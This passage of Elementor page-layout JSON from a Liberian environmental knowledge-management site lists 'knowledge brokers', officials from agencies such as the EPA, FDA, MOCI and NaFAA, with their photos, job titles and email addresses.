Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\nManager, ESIA\\nDepartment of Compliance and Enforcement\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"